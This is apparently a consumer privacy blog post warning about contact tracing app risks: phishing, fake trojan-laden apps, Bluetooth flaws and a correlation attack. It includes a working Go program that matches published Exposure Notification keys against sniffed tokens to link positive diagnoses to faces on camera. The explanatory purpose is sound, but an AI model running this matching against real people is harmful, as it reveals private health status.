Warning – Contact Tracing Apps Can Be Exploited!

Contact tracing apps have been lauded as a new way to stop the spread of the coronavirus. Used together with other precautions (wearing masks indoors, disinfecting surfaces and your hands often, practicing social distancing, etc.), they should help us return to our normal lives while also staying safe.


If you’re not familiar with them, they’re mobile apps that alert you when you have been near someone who later tests positive, or when you have visited a place where someone infected with COVID-19 has been. They use either Bluetooth or location services to do that:

  • Bluetooth – Using Google and Apple’s new Exposure Notification API, iOS and Android phones broadcast randomised Bluetooth tokens and store the tokens they hear from phones in range. When a user reports a positive diagnosis, their daily keys are published; every app downloads them and checks its stored tokens against them locally, and anyone who was near that person gets an exposure alert. Nothing about who met whom leaves the phone unless a match is found.
  • Location services – The apps use cellular signals, WiFi signals, and GPS data to log all the locations you visit throughout the day. If a user reports testing positive, the app notifies you that you visited the same place(s) as that user. This approach needs a central record of everyone’s movements, which is why it is the more privacy-hostile of the two.

There are tons of contact tracing apps on the app stores (just look at all the different apps around the world!), and governments hope adoption will rise steadily.

But are they safe?

That’s a whole different story.

4 Ways Contact Tracing Apps Can Be Exploited

According to our research, these are the risks you expose yourself to:

1. Phishing Attacks

Scammers can pose as contact tracers, sending bogus text message alerts to people. The message tells them they came into contact with someone infected with COVID-19 and instructs them to follow a link for the next steps.

Unfortunately, that link doesn’t lead to a government website, but a fake phishing site set up by cybercriminals. The site asks for personal information, which the scammers can log and later use to commit identity theft or gain access to people’s bank accounts.

2. Fake Contact Tracing Apps

Researchers found twelve fake apps posing as contact tracers on third-party download sites (so, not the App Store or Google Play). Here’s how malicious they were:

  • Four of them carried the Anubis banking trojan, which logs keystrokes and can also record phone calls, or SpyNote, a trojan that can read your contacts, GPS location, and text messages.
  • Eight of them used generic malware strains. There wasn’t any in-depth information about those, but malware is dangerous no matter the strain.

What’s more, criminals have already used a fake version of the NHS contact tracing app alongside phishing attacks in the UK.

You could argue that fake apps aren’t such a huge risk as long as you avoid shady download sites. But consider this: a capable attacker can make a page look exactly like an official government website or an App Store/Google Play listing. So before installing, make sure you are actually inside the store app (not a web page imitating it) and that the publisher shown is your health authority.

3. Bluetooth Vulnerabilities

Many contact tracing apps rely on Bluetooth to work. Unfortunately, Bluetooth has had (and continues to have) various security issues. Here are just a few of them:

  • BIAS attack – A recent flaw in Bluetooth authentication that lets an attacker in range impersonate a device you previously paired with, without knowing the pairing key.
  • KNOB attack – Lets an attacker in range force two Bluetooth devices to negotiate an encryption key with as little as one byte of entropy, which is then trivial to brute-force, so the traffic can be read or tampered with.
  • BlueBorne – A set of flaws in several Bluetooth stacks that let an attacker in range connect to and take over a device without pairing or any user interaction.


Issues like these do get patched quickly, true. But if you use an off-brand device because it’s cheaper, there’s a chance the manufacturer never rolled out the updates. And because a contact tracing app needs Bluetooth switched on all day, any unpatched flaw in the Bluetooth stack is exposed for far longer than it would be otherwise.

4. Correlation Attacks

This is an issue with Apple and Google’s new API. While it does make it hard for eavesdroppers to track people by their Bluetooth tokens (the tokens change every few minutes and can’t be linked to each other without the key), the FTC’s former chief technologist, Ashkan Soltani, showed how a correlation attack can still reveal users’ identities.

Basically, the attacker needs a camera recording the faces of passers-by and a rooted smartphone (or any Bluetooth sniffer) that logs every contact-tracing token it hears, together with the time it heard it.

When someone reports testing positive, their daily keys are published by the contact tracing server so that every app can download them. The attacker downloads them too, regenerates the tokens those keys would have produced in each 10-minute window, and matches them against the tokens logged at the exact moment someone passed the camera. A match ties a published key, and therefore a positive diagnosis, to a face on video.

TL;DR: a determined attacker can work out who tested positive for COVID-19, even though the new API is designed to keep everyone anonymous.
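To make the matching step concrete, here is an added example written for this page. It is not Soltani’s demonstration and not code from Google, Apple or any tracing app; it follows the Exposure Notification key schedule, in which a 16-byte daily Temporary Exposure Key is expanded with HKDF into a Rolling Proximity Identifier Key, and AES-128 of that key over the 10-minute interval number gives the token the phone actually broadcasts. The key bytes, the timestamps and the sniffer log are all constructed for the example, and the two-hour clock-drift tolerance is a choice made here, not something the page or the spec is being quoted on.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// hkdfSHA256 is HKDF (RFC 5869) with an empty salt, which the Exposure
// Notification crypto spec uses to derive sub-keys from the daily key.
func hkdfSHA256(ikm, info []byte, length int) []byte {
	ext := hmac.New(sha256.New, make([]byte, sha256.Size)) // empty salt = HashLen zeros
	ext.Write(ikm)
	prk := ext.Sum(nil)
	var out, prev []byte
	for i := byte(1); len(out) < length; i++ { // T(i) = HMAC(prk, T(i-1) || info || i)
		h := hmac.New(sha256.New, prk)
		h.Write(prev)
		h.Write(info)
		h.Write([]byte{i})
		prev = h.Sum(nil)
		out = append(out, prev...)
	}
	return out[:length]
}

// rpiKey derives the Rolling Proximity Identifier Key from a Temporary
// Exposure Key (TEK), the daily key that is published after a positive test.
func rpiKey(tek []byte) []byte { return hkdfSHA256(tek, []byte("EN-RPIK"), 16) }

// rollingProximityID is the token broadcast during one 10-minute interval:
// AES-128(RPIK, "EN-RPI" || 6 zero bytes || ENIN little-endian), ENIN = unix/600.
func rollingProximityID(rpik []byte, enin uint32) []byte {
	block, err := aes.NewCipher(rpik)
	if err != nil {
		panic(err) // rpik is always 16 bytes here
	}
	padded := make([]byte, 16)
	copy(padded, "EN-RPI")
	binary.LittleEndian.PutUint32(padded[12:], enin)
	rpi := make([]byte, 16)
	block.Encrypt(rpi, padded)
	return rpi
}

// Observation is one token the sniffer heard and when (unix seconds).
type Observation struct {
	EpochSeconds int64
	RPI          []byte
}

// matchDiagnosisKey regenerates all 144 tokens a published TEK produced during
// its day of validity and returns the sniffer observations that match, i.e.
// the moments the key's owner walked past the camera.
func matchDiagnosisKey(tek []byte, tekStartENIN uint32, obs []Observation) []Observation {
	rpik := rpiKey(tek)
	byRPI := make(map[string]uint32, 144)
	for j := uint32(0); j < 144; j++ {
		byRPI[string(rollingProximityID(rpik, tekStartENIN+j))] = tekStartENIN + j
	}
	var hits []Observation
	for _, o := range obs {
		enin, ok := byRPI[string(o.RPI)]
		if !ok {
			continue
		}
		// Tolerate clock drift between phone and sniffer: 12 intervals (2 h), chosen here.
		if drift := o.EpochSeconds/600 - int64(enin); drift >= -12 && drift <= 12 {
			hits = append(hits, o)
		}
	}
	return hits
}

// constructedScenario builds a sample sniffer log (constructed, not captured):
// one token from the device whose key later gets published, one from an
// unrelated device, and one junk entry.
func constructedScenario() (tek []byte, tekStartENIN uint32, obs []Observation) {
	tek, _ = hex.DecodeString("0123456789abcdef0123456789abcdef") // constructed, not a real key
	tekStartENIN = 1590969600 / 600                                 // 2020-06-01 00:00 UTC
	seen := int64(1591020200)                                       // 14:03:20 UTC, in front of the camera
	other, _ := hex.DecodeString("fedcba9876543210fedcba9876543210") // another device's key
	obs = []Observation{
		{seen - 90, rollingProximityID(rpiKey(other), uint32((seen-90)/600))},
		{seen, rollingProximityID(rpiKey(tek), uint32(seen/600))},
		{seen + 45, bytes.Repeat([]byte{0xab}, 16)},
	}
	return tek, tekStartENIN, obs
}

func main() {
	tek, start, obs := constructedScenario()
	fmt.Printf("published TEK %x, valid from interval %d\n", tek, start)
	for _, h := range matchDiagnosisKey(tek, start, obs) {
		fmt.Printf("token %x heard at unix %d: the camera frame from that second shows who tested positive\n", h.RPI, h.EpochSeconds)
	}
}
```

Run it with `go run` and it prints the one sniffed token that the published key explains, plus the second it was heard; line that up with the camera’s timestamps and the anonymous key has a face. Note that this is the same matching your own app performs when it downloads the published keys and compares them with the tokens it stored, which is exactly why everything the attacker needs is public by design.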

Privacy Concerns Are Also a Problem

Let’s say you’re not worried about those vulnerabilities. Fair enough, but how does the app handle your privacy?

That’s actually one of the reasons adoption is so low. People feel uncomfortable sharing too much data with these apps.

No surprises there, especially when some apps ask for far too much personal information, like your:

  • Full name
  • Phone number
  • Profession
  • Gender
  • Age

Some of them even ask for access to your phone’s contacts.

Furthermore, some contact tracing apps might share all the data they collect with third parties. We’re not just talking about health officials and people in the government, but also private companies and advertisers.

Overall, it’s extremely intrusive and feels very creepy.

Finding a Reliable Contact Tracing App

Don’t worry – it won’t take you hours of research. Just use ProPrivacy’s guide to all the different apps around the world.

They’re ranked by how well they handle privacy, so check whether the app(s) available in your area appear there and how safe they are to use.

How Do You Feel about Contact Tracing Apps?

Do you think they’re reliable and safe to use? Or do you believe they’re a privacy nightmare that’s just waiting to happen?

Whatever your opinion, go ahead and share it with us in the comments or on social media. Also, if you know other ways these apps can be exploited, please let us know.
